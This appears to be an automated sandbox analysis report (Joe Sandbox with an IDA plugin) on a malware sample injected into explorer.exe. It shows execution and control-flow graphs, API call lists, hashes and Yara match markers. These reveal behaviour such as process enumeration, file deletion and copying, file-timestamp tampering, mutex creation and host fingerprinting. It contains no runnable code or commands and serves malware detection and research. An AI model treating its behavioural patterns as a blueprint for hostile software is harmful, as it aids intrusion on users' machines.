                                                                                                            • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                            APIs
                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425704259.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_40b000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                            • String ID: -
                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                            • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                            • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                            • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                            • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:39.2%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:3.1%
                                                                                                            Total number of Nodes:228
                                                                                                            Total number of Limit Nodes:22
                                                                                                            execution_graph 2639 83819b8 2640 83819c9 2639->2640 2641 8381952 2639->2641 2642 83819ea 2640->2642 2643 83819fb 2640->2643 2646 8381a10 20 API calls 2642->2646 2644 8381a03 2643->2644 2647 8381a10 2643->2647 2646->2644 2648 8381a60 7 API calls 2647->2648 2649 8381a22 2648->2649 2650 8381a3d 2649->2650 2651 8381a2b SleepEx 2649->2651 2650->2644 2651->2651 2652 8381a3b 2651->2652 2653 8382254 2 API calls 2652->2653 2654 8381a50 2653->2654 2655 8381e1c 10 API calls 2654->2655 2656 8381a58 2655->2656 2657 83817fb 2658 8381827 2657->2658 2659 8381944 2658->2659 2660 83819ea 2658->2660 2661 83819fb 2658->2661 2664 8381a10 20 API calls 2660->2664 2662 8381a03 2661->2662 2663 8381a10 20 API calls 2661->2663 2663->2662 2664->2662 2421 ac41a10 2431 ac41a60 2421->2431 2424 ac41a3d 2425 ac41a2b SleepEx 2425->2425 2426 ac41a3b 2425->2426 2438 ac42254 2426->2438 2432 ac41a97 2431->2432 2433 ac41b60 RtlCreateHeap 2432->2433 2437 ac41a22 2432->2437 2434 ac41b91 2433->2434 2435 ac41d10 CreateThread 2434->2435 2434->2437 2436 ac41d41 CreateThread 2435->2436 2458 ac43c84 2435->2458 2436->2437 2455 ac43d60 2436->2455 2437->2424 2437->2425 2439 ac42272 2438->2439 2466 ac44ad0 2439->2466 2441 ac41a50 2442 ac41e1c 2441->2442 2472 ac44d20 2442->2472 2444 ac41e57 2445 ac41e88 CreateMutexExA 2444->2445 2446 ac41ea2 2445->2446 2476 ac44e90 2446->2476 2448 ac41ee1 2481 ac41f94 2448->2481 2453 ac41f4e 2493 ac422fc 2453->2493 2499 ac42d60 2453->2499 2456 ac43d96 2455->2456 2457 ac43d72 EnumWindows SleepEx 2455->2457 2457->2456 2457->2457 2459 ac43ca1 CreateToolhelp32Snapshot 2458->2459 2460 ac43d3b 2458->2460 2461 ac43cb5 Process32First 2459->2461 2462 ac43d23 SleepEx 2459->2462 2464 ac43ccd 2461->2464 2462->2459 2462->2460 2463 ac43d1a CloseHandle 2463->2462 2464->2463 2465 ac43d08 Process32Next 2464->2465 2465->2464 2467 ac44af9 2466->2467 2468 ac44b0d GetTokenInformation 2467->2468 2471 ac44b6a 2467->2471 2469 ac44b38 2468->2469 2470 ac44b42 GetTokenInformation 2469->2470 2470->2471 2471->2441 2473 ac44d4d GetVolumeInformationA 2472->2473 2475 ac44da0 2473->2475 2475->2444 2479 ac44eb2 2476->2479 2477 ac44f6e ObtainUserAgentString 2477->2448 2478 ac44ef3 RegQueryValueExA 2478->2479 2479->2478 2480 ac44f46 2479->2480 2480->2477 2483 ac41fb7 2481->2483 2482 ac41f0d CreateFileMappingA 2482->2453 2483->2482 2484 ac420ce 2483->2484 2485 ac4201b DeleteFileW CopyFileW 2483->2485 2502 ac43520 2484->2502 2485->2482 2486 ac4203b DeleteFileW 2485->2486 2489 ac42051 2486->2489 2488 ac420eb CreateFileW 2488->2482 2490 ac42086 DeleteFileW 2489->2490 2491 ac4209a 2490->2491 2508 ac449b0 2491->2508 2494 ac4232d 2493->2494 2515 ac4337c CreateFileW 2494->2515 2496 ac42342 2517 ac4239c 2496->2517 2498 ac42353 2498->2453 2500 ac4337c CreateFileW 2499->2500 2501 ac42d83 2500->2501 2501->2453 2503 ac43541 2502->2503 2504 ac43561 GetUserNameW 2503->2504 2505 ac43582 2504->2505 2513 ac43678 CoCreateInstance 2505->2513 2507 ac4359d 2507->2488 2509 ac449d7 2508->2509 2510 ac449f7 SetFileAttributesW CreateFileW 2509->2510 2511 ac44a42 SetFileTime 2510->2511 2512 ac44a63 2511->2512 2512->2484 2514 ac436d6 2513->2514 2514->2507 2516 ac433d1 2515->2516 2516->2496 2541 ac43e70 2517->2541 2519 ac4282d 2521 ac43e70 RtlReAllocateHeap 2519->2521 2520 ac42648 2522 ac426e7 2520->2522 2524 ac42789 2520->2524 2539 ac42660 2520->2539 2528 ac42854 2521->2528 2526 ac426fc DeleteFileW DeleteFileW 2522->2526 2532 ac427ec 2522->2532 2523 ac423ef 2523->2532 2536 ac42624 2523->2536 2540 ac449b0 3 API calls 2523->2540 2525 ac43e70 RtlReAllocateHeap 2524->2525 2531 ac427b0 2525->2531 2527 ac4271e 2526->2527 2530 ac43e70 RtlReAllocateHeap 2527->2530 2529 ac428d0 RtlReAllocateHeap 2528->2529 2528->2532 2529->2532 2533 ac42748 2530->2533 2531->2532 2534 ac428d0 RtlReAllocateHeap 2531->2534 2532->2498 2537 ac42765 SleepEx RtlExitUserThread 2533->2537 2534->2532 2535 ac43e70 RtlReAllocateHeap 2535->2539 2536->2519 2536->2520 2537->2532 2539->2522 2539->2532 2539->2535 2545 ac428d0 2539->2545 2540->2536 2542 ac43e9f 2541->2542 2551 ac4400c 2542->2551 2544 ac43fbf 2544->2523 2546 ac428d9 2545->2546 2548 ac42cf3 2545->2548 2547 ac4400c RtlReAllocateHeap 2546->2547 2550 ac429d8 2546->2550 2547->2550 2548->2539 2549 ac43e70 RtlReAllocateHeap 2549->2548 2550->2548 2550->2549 2553 ac44056 2551->2553 2554 ac4404f 2551->2554 2552 ac4433f RtlReAllocateHeap 2552->2553 2553->2552 2553->2554 2554->2544 2696 ac41971 2697 ac41972 2696->2697 2698 ac41a10 34 API calls 2697->2698 2699 ac41a03 2698->2699 2555 8381a10 2565 8381a60 2555->2565 2558 8381a3d 2559 8381a2b SleepEx 2559->2559 2560 8381a3b 2559->2560 2572 8382254 2560->2572 2567 8381a97 2565->2567 2566 8381a22 2566->2558 2566->2559 2567->2566 2568 8381b60 RtlCreateHeap 2567->2568 2569 8381b91 2568->2569 2569->2566 2570 8381d10 CreateThread 2569->2570 2571 8381d41 CreateThread 2570->2571 2592 8383c84 2570->2592 2571->2566 2589 8383d60 2571->2589 2573 8382272 2572->2573 2597 8384ad0 2573->2597 2575 8381a50 2576 8381e1c 2575->2576 2603 8384d20 2576->2603 2578 8381e57 2579 8381e88 CreateMutexExA 2578->2579 2580 8381ea2 2579->2580 2607 8384e90 2580->2607 2582 8381ee1 2611 8381f94 2582->2611 2587 8381f4e 2616 83822fc 2587->2616 2622 8382d60 2587->2622 2590 8383d72 EnumWindows SleepEx 2589->2590 2591 8383d96 2589->2591 2590->2590 2590->2591 2593 8383d3b 2592->2593 2594 8383ca1 CreateToolhelp32Snapshot 2592->2594 2595 8383d23 SleepEx 2594->2595 2596 8383cb5 2594->2596 2595->2593 2595->2594 2596->2595 2598 8384af9 2597->2598 2599 8384b0d GetTokenInformation 2598->2599 2602 8384b6a 2598->2602 2600 8384b38 2599->2600 2601 8384b42 GetTokenInformation 2600->2601 2601->2602 2602->2575 2604 8384d4d GetVolumeInformationA 2603->2604 2606 8384da0 2604->2606 2606->2578 2608 8384eb2 2607->2608 2609 8384f46 2608->2609 2610 8384ef3 RegQueryValueExA 2608->2610 2609->2582 2610->2608 2612 8381fb7 2611->2612 2613 8381f0d CreateFileMappingA 2612->2613 2625 8383520 2612->2625 2613->2587 2615 83820eb CreateFileW 2615->2613 2617 838232d 2616->2617 2631 838337c CreateFileW 2617->2631 2619 8382342 2633 838239c 2619->2633 2621 8382353 2621->2587 2623 838337c CreateFileW 2622->2623 2624 8382d83 2623->2624 2624->2587 2626 8383541 2625->2626 2629 8383678 CoCreateInstance 2626->2629 2628 838359d 2628->2615 2630 83836d6 2629->2630 2630->2628 2632 83833d1 2631->2632 2632->2619 2634 83823ef 2633->2634 2635 83826fc DeleteFileW DeleteFileW 2634->2635 2637 8382789 2634->2637 2636 838271e 2635->2636 2638 8382777 RtlExitUserThread 2636->2638 2637->2621 2638->2637 2681 ac4192c 2682 ac4193a 2681->2682 2683 ac41944 2682->2683 2686 ac41a10 2682->2686 2687 ac41a60 10 API calls 2686->2687 2688 ac41a22 2687->2688 2689 ac41a03 2688->2689 2690 ac41a2b SleepEx 2688->2690 2690->2690 2691 ac41a3b 2690->2691 2692 ac42254 2 API calls 2691->2692 2693 ac41a50 2692->2693 2694 ac41e1c 21 API calls 2693->2694 2695 ac41a58 2694->2695 2700 ac419b8 2701 ac41952 2700->2701 2702 ac419c9 2700->2702 2703 ac41a10 34 API calls 2702->2703 2704 ac41a03 2703->2704 2705 ac417fb 2707 ac41827 2705->2707 2706 ac41901 2707->2706 2708 ac41a10 34 API calls 2707->2708 2709 ac41a03 2708->2709
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                            • Instruction ID: faf7f833a78f116cda21f22da05eb77392aa7442ffc7df185baa9e21d9ed5bdb
                                                                                                            • Opcode Fuzzy Hash: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                            • Instruction Fuzzy Hash: 89E1F834608A4CCFCB94EF28C885EA9B7F1FFA9305F114699E44ACB265DB70E945CB41
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32 ref: 0AC43574
                                                                                                              • Part of subcall function 0AC43678: CoCreateInstance.COMBASE ref: 0AC436C5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstanceNameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3213660374-0
                                                                                                            • Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                            • Instruction ID: 1b2d87ab1a5b9b0fc081da06fd8dd8bf6f7286aa47a3521eb3261c16a410cb8c
                                                                                                            • Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                            • Instruction Fuzzy Hash: 5511F830B18B4C4FCB90EF6C901876EB6E2EBDC210F510A6E984DC335ADA748D449785

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 ac4239c-ac423f9 call ac43e70 3 ac428a7 0->3 4 ac423ff-ac42404 0->4 5 ac428ad-ac428c7 3->5 4->3 6 ac4240a-ac4240d 4->6 6->3 7 ac42413-ac4241e 6->7 8 ac42424-ac42457 call ac45058 7->8 9 ac42897-ac428a5 call ac453d8 7->9 8->9 15 ac4245d-ac42482 call ac44fac call ac4516c 8->15 9->3 9->5 20 ac42484-ac4249e 15->20 21 ac424ad 15->21 20->21 26 ac424a0-ac424ab 20->26 22 ac424b2-ac424cb call ac4516c 21->22 27 ac424d1-ac424e4 22->27 28 ac4263a-ac42642 22->28 26->22 29 ac42536-ac42538 27->29 30 ac424e6-ac4252d 27->30 31 ac4282d-ac4285a call ac43e70 28->31 32 ac42648-ac4264c 28->32 29->28 36 ac4253e-ac425b0 call ac453f8 29->36 30->29 44 ac4285c-ac42863 31->44 45 ac4288f-ac42895 31->45 34 ac426f4-ac42784 call ac44730 DeleteFileW * 2 call ac434d4 call ac43e70 call ac453d8 SleepEx RtlExitUserThread 32->34 35 ac42652-ac4265a 32->35 34->9 39 ac42660-ac4266d 35->39 40 ac42789-ac427b6 call ac43e70 35->40 79 ac425b2-ac4262a call ac44fac call ac45058 call ac449b0 call ac4535c 36->79 80 ac4262f-ac42635 call ac453d8 36->80 39->45 56 ac42673-ac42676 39->56 40->45 54 ac427bc-ac427c3 40->54 44->45 50 ac42865-ac42868 44->50 45->9 50->45 55 ac4286a-ac4288a call ac428d0 call ac453d8 50->55 54->45 58 ac427c9-ac427cc 54->58 55->45 56->45 61 ac4267c-ac42680 56->61 58->45 64 ac427d2-ac4282b call ac428d0 call ac44730 call ac453d8 58->64 66 ac426e7-ac426ee 61->66 67 ac42682-ac426af call ac43e70 61->67 64->45 66->34 66->45 77 ac426e1-ac426e5 67->77 78 ac426b1-ac426b8 67->78 77->66 77->67 78->77 82 ac426ba-ac426bd 78->82 79->80 80->28 82->77 87 ac426bf-ac426dc call ac428d0 call ac453d8 82->87 87->77
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile$ExitSleepThreadUser
                                                                                                            • String ID: |:|
                                                                                                            • API String ID: 2796381497-3736120136
                                                                                                            • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                            • Instruction ID: d8dc90a844e430926c4a0b14d3b5b2fbc00dcb855c5e42e3d13bfc36cb8394a7
                                                                                                            • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                            • Instruction Fuzzy Hash: ACE1B531718F488BD769AF6884593BE76D1FB98311F11062EE49FC3241DF74EA42878A

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32 ref: 0AC4201E
                                                                                                            • CopyFileW.KERNEL32 ref: 0AC4202D
                                                                                                            • DeleteFileW.KERNEL32 ref: 0AC4203E
                                                                                                            • DeleteFileW.KERNEL32 ref: 0AC42089
                                                                                                              • Part of subcall function 0AC449B0: SetFileAttributesW.KERNEL32 ref: 0AC449FF
                                                                                                              • Part of subcall function 0AC449B0: CreateFileW.KERNEL32 ref: 0AC44A29
                                                                                                              • Part of subcall function 0AC449B0: SetFileTime.KERNEL32 ref: 0AC44A54
                                                                                                            • CreateFileW.KERNEL32 ref: 0AC42115
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Delete$Create$AttributesCopyTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 642576546-0
                                                                                                            • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                            • Instruction ID: 523b1678c9985648f17dfe7715e99e2ae3edcbbfc545c4ee1593754f2aeadab6
                                                                                                            • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                            • Instruction Fuzzy Hash: 54416C30718A4C4FDBA8AFAC94583AE75D2EBCC610F15417EE80EC3386DE349D069789

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 144 ac43c84-ac43c9b 145 ac43ca1-ac43cb3 CreateToolhelp32Snapshot 144->145 146 ac43d3b-ac43d54 144->146 147 ac43cb5-ac43ccb Process32First 145->147 148 ac43d23-ac43d35 SleepEx 145->148 149 ac43d16-ac43d18 147->149 148->145 148->146 150 ac43ccd-ac43ce4 call ac45140 149->150 151 ac43d1a-ac43d1d CloseHandle 149->151 154 ac43ce6-ac43ce8 150->154 151->148 155 ac43cfc-ac43d03 call ac447a4 154->155 156 ac43cea-ac43cf8 154->156 159 ac43d08-ac43d10 Process32Next 155->159 156->154 157 ac43cfa 156->157 157->159 159->149
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 2482764027-0
                                                                                                            • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                            • Instruction ID: dcaf639009242eeb3cf3f56c389302adeba1aea35f8ca2dbd50af97efca65958
                                                                                                            • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                            • Instruction Fuzzy Hash: 8B210630228A488FEB18EF24C4887AA72E2FFC8315F19077ED84FDE285DB3485459B15

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 160 838239c-83823f9 call 8383e70 163 83823ff-8382404 160->163 164 83828a7 160->164 163->164 165 838240a-838240d 163->165 166 83828ad-83828c7 164->166 165->164 167 8382413-838241e 165->167 168 8382424-8382457 call 8385058 167->168 169 8382897-83828a5 call 83853d8 167->169 168->169 175 838245d-8382482 call 8384fac call 838516c 168->175 169->164 169->166 180 83824ad 175->180 181 8382484-838249e 175->181 182 83824b2-83824cb call 838516c 180->182 181->180 185 83824a0-83824ab 181->185 187 838263a-8382642 182->187 188 83824d1-83824e4 182->188 185->182 191 8382648-838264c 187->191 192 838282d-838285a call 8383e70 187->192 189 8382536-8382538 188->189 190 83824e6-838252d 188->190 189->187 193 838253e-83825b0 call 83853f8 189->193 190->189 194 8382652-838265a 191->194 195 83826f4-8382784 call 8384730 DeleteFileW * 2 call 83834d4 call 8383e70 call 83853d8 RtlExitUserThread 191->195 206 838285c-8382863 192->206 207 838288f-8382895 192->207 240 838262f-8382635 call 83853d8 193->240 241 83825b2-838262a call 8384fac call 8385058 call 83849b0 call 838535c 193->241 199 8382789-83827b6 call 8383e70 194->199 200 8382660-838266d 194->200 195->169 199->207 217 83827bc-83827c3 199->217 200->207 213 8382673-8382676 200->213 206->207 209 8382865-8382868 206->209 207->169 209->207 215 838286a-838288a call 83828d0 call 83853d8 209->215 213->207 218 838267c-8382680 213->218 215->207 217->207 222 83827c9-83827cc 217->222 223 8382682-83826af call 8383e70 218->223 224 83826e7-83826ee 218->224 222->207 228 83827d2-838282b call 83828d0 call 8384730 call 83853d8 222->228 238 83826e1-83826e5 223->238 239 83826b1-83826b8 223->239 224->195 224->207 228->207 238->223 238->224 239->238 243 83826ba-83826bd 239->243 240->187 241->240 243->238 248 83826bf-83826dc call 83828d0 call 83853d8 243->248 248->238
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile$ExitThreadUser
                                                                                                            • String ID: |:|
                                                                                                            • API String ID: 3702773391-3736120136
                                                                                                            • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                            • Instruction ID: e4a99b3ef3b8524880cd368c79a2327b07736eb0c03347c99d77040c6eb07ce5
                                                                                                            • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                            • Instruction Fuzzy Hash: EBE18030718F488BDB69BB68C4597BA76D1FBD8312F10062ED49FC3281DF74A9428786

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 325 ac41a60-ac41a95 326 ac41a97-ac41a9e 325->326 327 ac41ab3-ac41ab7 326->327 328 ac41aa0-ac41ab1 327->328 329 ac41ab9-ac41ac5 327->329 328->327 330 ac41ac7-ac41acd 329->330 331 ac41adc-ac41ae1 329->331 332 ac41ae7-ac41aee 330->332 333 ac41acf-ac41ada 330->333 331->332 334 ac41af0-ac41af7 332->334 335 ac41af9-ac41aff 332->335 333->332 334->335 336 ac41b01-ac41b0b 334->336 335->326 335->336 337 ac41b0d-ac41b14 336->337 338 ac41b1a-ac41b32 call ac41d98 336->338 337->338 339 ac41d6f 337->339 338->339 343 ac41b38-ac41b5a call ac41d98 338->343 341 ac41d71-ac41d8f 339->341 343->339 346 ac41b60-ac41b8f RtlCreateHeap 343->346 347 ac41b91-ac41bab call ac44fac 346->347 347->339 351 ac41bb1-ac41bc9 call ac4535c 347->351 351->347 354 ac41bcb-ac41be6 call ac41d98 351->354 354->339 357 ac41bec-ac41c0b call ac41d98 354->357 357->339 360 ac41c11-ac41c30 call ac41d98 357->360 360->339 363 ac41c36-ac41c55 call ac41d98 360->363 363->339 366 ac41c5b-ac41c7a call ac41d98 363->366 366->339 369 ac41c80-ac41c9f call ac41d98 366->369 369->339 372 ac41ca5-ac41d00 call ac44bac * 3 369->372 372->339 379 ac41d02-ac41d09 372->379 379->339 380 ac41d0b-ac41d0e 379->380 380->339 381 ac41d10-ac41d60 CreateThread * 2 380->381 383 ac41d68-ac41d6d 381->383 383->341
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$Thread$Heap
                                                                                                            • String ID: iP+
                                                                                                            • API String ID: 1054751041-51890417
                                                                                                            • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                            • Instruction ID: d2608f934e21c0eaff04a3fbf95e8f97ed305957eedab250a147a6df9c8ad25b
                                                                                                            • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                            • Instruction Fuzzy Hash: 3C91C770618E088FDF58EF18D8916A573D6FB98300F4A027DDC8ECB156DA34D581DB9A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 266 8381a60-8381a95 267 8381a97-8381a9e 266->267 268 8381ab3-8381ab7 267->268 269 8381ab9-8381ac5 268->269 270 8381aa0-8381ab1 268->270 271 8381adc-8381ae1 269->271 272 8381ac7-8381acd 269->272 270->268 273 8381ae7-8381aee 271->273 272->273 274 8381acf-8381ada 272->274 275 8381af9-8381aff 273->275 276 8381af0-8381af7 273->276 274->273 275->267 277 8381b01-8381b0b 275->277 276->275 276->277 278 8381b1a-8381b32 call 8381d98 277->278 279 8381b0d-8381b14 277->279 280 8381d6f 278->280 284 8381b38-8381b5a call 8381d98 278->284 279->278 279->280 282 8381d71-8381d8f 280->282 284->280 287 8381b60-8381b8f RtlCreateHeap 284->287 288 8381b91-8381bab call 8384fac 287->288 288->280 292 8381bb1-8381bc9 call 838535c 288->292 292->288 295 8381bcb-8381be6 call 8381d98 292->295 295->280 298 8381bec-8381c0b call 8381d98 295->298 298->280 301 8381c11-8381c30 call 8381d98 298->301 301->280 304 8381c36-8381c55 call 8381d98 301->304 304->280 307 8381c5b-8381c7a call 8381d98 304->307 307->280 310 8381c80-8381c9f call 8381d98 307->310 310->280 313 8381ca5-8381d00 call 8384bac * 3 310->313 313->280 320 8381d02-8381d09 313->320 320->280 321 8381d0b-8381d0e 320->321 321->280 322 8381d10-8381d60 CreateThread * 2 321->322 324 8381d68-8381d6d 322->324 324->282
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$Thread$Heap
                                                                                                            • String ID: iP+
                                                                                                            • API String ID: 1054751041-51890417
                                                                                                            • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                            • Instruction ID: 8821e5596b8e4c723ed56dc0d59ebe4269cfc62b6d56a6bffb15f68a3d00576f
                                                                                                            • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                            • Instruction Fuzzy Hash: 37918D30618E09CFCB54FF28D891AA973D6FBD8301B04417E9C4ECB256EA74D5468B96

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreateTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 1986686026-0
                                                                                                            • Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                            • Instruction ID: 1e3ed6d5d84f267f18a4e06afba7a60b50b267756d34c6897655daf39fa3f17a
                                                                                                            • Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
                                                                                                            • Instruction Fuzzy Hash: 2621FF3071CA4C8FDF64EF68988879EB6E2FBD8705F10456EA84EC7245DA34DA058782

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 393 ac44e90-ac44ed9 call ac44fac 397 ac44f63-ac44f92 call ac4535c ObtainUserAgentString 393->397 398 ac44edf 393->398 400 ac44ee1-ac44f23 call ac44fac RegQueryValueExA 398->400 404 ac44f25-ac44f44 call ac4535c call ac4516c 400->404 405 ac44f93 call ac4535c 400->405 408 ac44f98-ac44f9d 404->408 414 ac44f46-ac44f57 404->414 405->408 411 ac44f9f 408->411 412 ac44f59-ac44f5a 408->412 411->400 412->397 414->412
                                                                                                            APIs
                                                                                                            • RegQueryValueExA.KERNEL32 ref: 0AC44F15
                                                                                                            • ObtainUserAgentString.URLMON ref: 0AC44F7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AgentObtainQueryStringUserValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 4107646653-0
                                                                                                            • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                            • Instruction ID: 296cdbd2f459f3428951afe567e65640403a665ac70a0677221bce446237dd8f
                                                                                                            • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                            • Instruction Fuzzy Hash: A931C631608A4C8FDB18EF6CD8896E977D1FB98310B11027AEC4AC3146EE7098068795

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0AC44D20: GetVolumeInformationA.KERNEL32 ref: 0AC44D8D
                                                                                                            • CreateMutexExA.KERNEL32 ref: 0AC41E8F
                                                                                                            • CreateFileMappingA.KERNEL32 ref: 0AC41F41
